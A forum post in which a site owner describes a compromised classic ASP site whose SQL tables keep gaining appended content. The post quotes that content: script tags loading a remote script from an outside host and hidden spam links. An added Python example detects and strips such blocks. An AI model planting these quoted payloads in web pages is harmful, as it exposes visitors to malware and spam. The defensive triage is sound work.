Hi All,
Got an e-mail today from Google Webmaster Tools.
Subject: Malware notification regarding "domain.com"
(I've changed the domain only in it.)
When I go to my website, sure enough, something is off.
The source files are classic ASP, and look clean and fine.
When I go to the SQL database, two tables seem to have additional data in only specific columns/fields.
Forum messages table, and another table that has webpage content to display, such as a footer, header etc.
The data added by "something/someone" seems to have been placed with some smarts. On the forum in the messages, only in the body message, and always at the bottom of the text already in it.
Same for the page content table, only specific pages that already had content in the body part, and always at the bottom.
When I navigated the webpage, it brought up some antivirus-looking scanning page, and probably infected my computer. (Here goes probably another reinstall.)
Funny thing is, the date stamps in the table records didn't change, so I'm figuring they somehow got in directly to SQL server to update only particular fields.
Anybody with any security ideas? I run SQL as is, but with a firewall in front of the servers, so only HTTP traffic should get through (that is, ports 80 and 443).
After I edited each field to delete the bad data, it came back in about half a day. I've changed SQL passwords too, and yet again it came back. Any ideas?
Here is the added foreign text:
Code:
</title><script src=http://stats-master111.info/ur.php></script></title><script src=http://stats-master111.info/ur.php></script>
Code:
</title><a style=display:none; href=http://worid-of-books.com >book</a></title><a style=display:none; href=http://worid-of-books.com >book</a> </title><a style=display:none; href=http://find-top-casinos.com >casino</a></title><a style=display:none; href=http://find-top-casinos.com >casino</a> </title><script src=http://stats-master111.info/ur.php></script></title><script src=http://stats-master111.info/ur.php></script>
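Added example, not part of the original post: one way to triage exported rows from the two affected tables, finding fields that end with the appended block quoted above, returning the cleaned text and listing the hosts it references. The row layout (`id`, `body`), the function names and the sample rows are assumptions made for illustration.

```python
import re

# Shape of the text quoted in the post: a stray </title> followed by either a
# remote <script src=...></script> or a hidden <a style=display:none ...> link.
UNIT = (r"\s*</title>\s*(?:"
        r"<script\b[^>]*\bsrc\s*=[^>]*>\s*</script>"
        r"|<a\b[^>]*display\s*:\s*none[^>]*>[^<]*</a>)")
# One or more such units, anchored to the end of the field, because the post
# says the text was always appended at the bottom of existing content.
TRAILING_BLOCK = re.compile(r"(?:" + UNIT + r")+\s*\Z", re.IGNORECASE)
HOST = re.compile(r"https?://([^/\s>\"']+)", re.IGNORECASE)


def strip_injected_tail(value):
    """Return (cleaned_value, removed_block); removed_block is '' if clean."""
    match = TRAILING_BLOCK.search(value or "")
    if not match:
        return value, ""
    return value[:match.start()], match.group(0)


def scan_rows(rows, column):
    """Report rows whose `column` ends with the injected block."""
    findings = []
    for row in rows:
        cleaned, removed = strip_injected_tail(row[column])
        if removed:
            findings.append({
                "id": row["id"],
                "cleaned": cleaned,
                "hosts": sorted(set(h.lower() for h in HOST.findall(removed))),
            })
    return findings


# Constructed sample rows; the appended markup is the text quoted in the post.
SCRIPT = "</title><script src=http://stats-master111.info/ur.php></script>"
LINK = "</title><a style=display:none; href=http://worid-of-books.com >book</a>"
SAMPLE_ROWS = [
    {"id": 1, "body": "Welcome to the forum." + SCRIPT + SCRIPT},
    {"id": 2, "body": "Thanks, that <b>worked</b>!"},
    {"id": 3, "body": "Footer text" + LINK + LINK + " " + SCRIPT},
    {"id": 4, "body": "How do I close a </title> tag in <script> blocks?"},
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS, "body"):
        print(finding)
```

Cleaning stored values this way removes only the symptom: the post reports the text returning within about half a day, so the path that writes it still has to be found.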